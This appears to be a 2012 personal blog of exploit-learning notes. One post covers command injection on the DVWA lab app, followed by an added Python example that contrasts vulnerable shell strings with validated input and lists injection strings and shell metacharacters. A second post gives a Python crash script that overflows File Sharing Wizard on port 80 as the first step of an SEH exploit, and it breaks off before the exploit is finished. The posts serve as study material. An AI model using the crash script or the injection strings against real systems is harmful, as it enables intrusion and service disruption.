Saturday, 17 March 2012

Exploiting a Linux server through a DVWA vulnerability

It has been a long time since I could get to my blog, because of a damn game that is very fun to play. Now I am learning how to exploit a system through a web application vulnerability. My virtual server has DVWA (Damn Vulnerable Web Application) installed, and I will attack it. Now I will try to trigger errors to decide how to attack the system.

This picture is the DVWA screen. Of its many vulnerabilities, I will attack the command execution service available on DVWA. I think it is very easy to exploit. On the Linux command line we can use two commands at the same time, for example "ls | w"; the next command will be executed ahead of the first command.
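Added example, not part of the original post: the risky pattern behind this kind of command execution bug next to a hardened form. It assumes the web form takes an address and passes it to ping; the function names and sample inputs are made up for illustration.

```python
import ipaddress
import subprocess

# Characters that let /bin/sh start or substitute a second command.
SHELL_META = set(";|&`$()<>\n")


def vulnerable_command(target):
    """Risky pattern: user input pasted into a string that is handed to a shell."""
    return "ping -c 3 " + target  # dangerous once run with shell=True


def safe_argv(target):
    """Allow-list validation: accept only a literal IPv4 or IPv6 address."""
    addr = ipaddress.ip_address(target.strip())  # raises ValueError otherwise
    return ["ping", "-c", "3", str(addr)]  # argv list, no shell parsing involved


def check(target):
    """Return (accepted, argv or rejection reason, shell metacharacters seen)."""
    meta = sorted(SHELL_META & set(target))
    try:
        return True, safe_argv(target), meta
    except ValueError:
        return False, "not an IP address", meta


def run_ping(target):
    """Run ping without a shell, so '|' or ';' can never act as an operator."""
    return subprocess.run(safe_argv(target), capture_output=True,
                          text=True, timeout=15)


# Constructed sample inputs: two plain addresses and two chained-command strings.
SAMPLES = ["127.0.0.1", "::1", "127.0.0.1 | w", "127.0.0.1; ls"]

if __name__ == "__main__":
    for sample in SAMPLES:
        accepted, detail, meta = check(sample)
        print("%-16r shell string: %-28r accepted=%s meta=%s detail=%s"
              % (sample, vulnerable_command(sample), accepted, meta, detail))
```

The chained inputs are rejected by the address check before any process is started, and the metacharacter list is useful as a log field for spotting injection attempts.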

Thursday, 01 March 2012

SEH (Exploitation File Sharing)

This time I will try to develop a buffer overflow exploit for an application that has SafeSEH / SEH. I will exploit File Sharing Wizard. It is not so different from before, just a development of the earlier exploitation, like the local exploit, but this application has protection against buffer overflows. OK, first, as usual, I will create an exploit program to send a first buffer and analyse the result.
To know how to build the exploit, we must sniff the traffic with Wireshark so we can put together the buffer for the application. This time I found the application running on port 80, as you can see in the picture.
Now I will make an exploit like the one I made before:
#!/usr/bin/python
# Python 2 script
import socket

target_address = "192.168.4.44"
target_port = 80

# 10000 "A" (0x41) bytes, followed by a request line carrying the same run
buffer = "\x41" * 10000
buffer += ('fuck %s HTTP/1.1\r\n' '\r\n') % (buffer)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Now see what happens in File Sharing Wizard.

The application has crashed :D. OK, I will develop it further.
The application has crashed, but EIP is not overwritten because the file sharing application has SEH. To see the SEH, click the View menu, then SEH chain, as in the picture. The buffer that was sent has been saved into the SEH chain.
The solution for an application that has an SEH chain is the POP POP RETN method.
Now I make the buffer again; now I will send a string of 10000 characters.
To be continued.
